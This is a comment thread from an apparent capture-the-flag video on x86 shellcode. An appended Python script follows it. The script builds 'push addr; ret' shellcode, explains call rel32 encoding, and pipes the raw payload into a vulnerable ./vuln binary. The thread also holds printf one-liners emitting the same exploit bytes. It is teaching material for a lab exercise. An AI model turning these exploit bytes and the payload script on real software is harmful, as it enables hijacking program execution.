As a computer science student, I really enjoy your content.
@mucktheman2720 6 years ago
I highly recommend using ipython shell instead of python shell as it makes it easier to explore all the cool things that different python objects can do. Tab complete is one of the best features when working with new modules and ipython gives you that ability. :D
@zanidd 6 years ago
And yet I'm sitting here, manually writing/translating the addresses, while pwntools reduces the amount of work involved. Cool video.
@SlyFluffyFox 3 years ago
Nice video man
@X3eRo0 6 years ago
It was amazing
@IdanBanani 4 years ago
5:52 How does pushing the function (symbol) address and returning (from main()?) result in calling the function? Can we also use call or another method? I just know that the return value should be stored in EAX.
@JackDjTom6 6 years ago
Please continue the Python challenge ^^
@oneloveafrica8860 1 year ago
How? Without knowing the return address? Where do you execute the code?
@austinmurphy9074 6 months ago
The vuln() function (shown in the source code at 1:48) has the lines void (*func)() = (void (*)())stuff; func(); Anything you pass to the program will be interpreted, cast to a function and executed.
@TheNecromorfe 6 years ago
Is it possible to solve it with ret2libc?
@_JohnHammond 6 years ago
A return2libc attack? I'm not an expert here, but I am sure you could do that if you could get your shellcode to return back to libc or did some ROP thing. There are probably some options for going with that approach, but admittedly I don't have any solid ideas off the top of my head.
@ponysopher6 жыл бұрын
I tried to do this on my own and wrote shellcode for a direct call to the win function at its address rather than pushing the address. That resulted in a segfault. Does anyone know why?
@mucktheman2720 6 years ago
There's a problem with a lot of print methods (like Python's print and the echo shell command) that append a newline character to the string. I'd recommend using printf instead if at all possible, as it doesn't pollute your output with newlines or other crap. Examples below; notice the extra crap you get with Python and echo.

    printf 'h@\x85\x04\x08\xc3' | hexdump -b
    0000000 150 100 205 004 010 303
    0000006

    echo -e 'h@\x85\x04\x08\xc3' | hexdump -b
    0000000 150 100 205 004 010 303 012
    0000007

    python -c 'print "h@\x85\x04\x08\xc3"' | hexdump -b
    0000000 150 100 205 004 010 303 012
    0000007
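An added example, not from the video or from any of the commenters, that ties the threads above together: it builds the "push addr; ret" shellcode whose bytes appear in the hexdump output, shows why a direct call to the win function cannot simply be encoded with its absolute address (the operand of x86 call is a displacement relative to the instruction's own location), and writes the payload as raw bytes so that no newline is appended the way print and echo do. The target address 0x08048540 is decoded from the quoted bytes h@\x85\x04\x08 and is assumed here to be the win function; the address in the real binary may differ. Standard library only, Python 3.

```python
"""Added example: build and emit the 'push addr; ret' shellcode from the
comments without a trailing newline. Not the video's own code."""
import io
import struct
import sys

# Assumed target: decoded from the bytes quoted in the comments. The real
# binary's win() address may be different; check it with nm or objdump.
WIN_ADDR = 0x08048540


def p32(value: int) -> bytes:
    """Pack a 32-bit value little-endian (same job as pwntools' p32)."""
    return struct.pack("<I", value & 0xFFFFFFFF)


def push_ret_shellcode(target: int) -> bytes:
    """x86 (32-bit) 'push imm32; ret'.

    push (0x68 imm32) leaves the target address on top of the stack and ret
    pops it straight into EIP, so the pair behaves like an absolute jump.
    Nothing else needs to be known: vuln() already jumped into the buffer
    with func(), so the buffer itself is where execution starts.
    """
    return b"\x68" + p32(target) + b"\xc3"


def call_rel32(instruction_addr: int, target: int) -> bytes:
    """x86 'call rel32' (0xE8) as it must be encoded at instruction_addr.

    The operand is NOT the target address: it is the displacement from the
    end of the 5-byte call instruction to the target. Putting the absolute
    address in that slot transfers control somewhere else entirely, and the
    encoding is only valid if you know where the shellcode will be loaded.
    """
    rel = target - (instruction_addr + 5)
    return b"\xe8" + struct.pack("<i", rel)


def emit_payload(payload: bytes, stream=None) -> int:
    """Write the payload raw, with no trailing newline. Returns bytes written.

    print() and echo append "\n"; writing to the binary buffer does not.
    """
    if stream is None:
        stream = sys.stdout.buffer
    return stream.write(payload)


def raw_bytes(payload: bytes) -> bytes:
    """Exactly what emit_payload() puts on the wire (captured in memory)."""
    buf = io.BytesIO()
    emit_payload(payload, buf)
    return buf.getvalue()


def bytes_from_print(payload: bytes) -> bytes:
    """What print() would have emitted for the same payload, for comparison."""
    buf = io.StringIO()
    print(payload.decode("latin-1"), file=buf)
    return buf.getvalue().encode("latin-1")


if __name__ == "__main__":
    # Usage: python3 exploit.py | ./vuln
    emit_payload(push_ret_shellcode(WIN_ADDR))
```

With pwntools installed, `context.arch = 'i386'` followed by `asm('push 0x08048540; ret')` produces the same six bytes as push_ret_shellcode(0x08048540); the stdlib version above is just the hand-encoded form of what the comments were typing into printf.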